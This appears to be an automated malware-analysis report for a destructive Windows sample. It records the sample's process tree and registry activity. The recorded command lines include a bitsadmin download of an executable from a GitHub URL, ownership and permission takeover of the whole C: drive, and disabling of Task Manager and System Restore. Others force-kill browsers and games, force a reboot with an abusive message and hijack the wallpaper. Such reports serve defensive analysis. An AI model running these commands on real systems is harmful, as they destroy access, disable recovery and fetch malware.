Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.ComfyCakesSave-ms C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.msg\Outlook.File.msg.14 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.sdl\OpenWithProgids C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.accdr\Access.ACCDRFile.14 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.aif\OpenWithProgIds C:\Windows\system32\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\System32\WScript.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2424 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe C:\Windows\system32\cmd.exe
PID 2424 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe C:\Windows\system32\cmd.exe
PID 2424 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe C:\Windows\system32\cmd.exe
PID 1392 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1392 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1392 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1392 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1392 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1392 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1392 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1392 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1392 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1392 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1392 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1392 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1392 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1392 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1392 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1392 wrote to memory of 1096 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 1096 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 1096 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1392 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1392 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1392 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1392 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 1696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 1696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 1696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1392 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe

"C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1FA.tmp\A1FB.tmp\A1FC.bat C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14339.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9503.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\25728.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM GenshinImpact.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\25595.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31048.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3416.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26548.vbs" 3627.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\3627.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

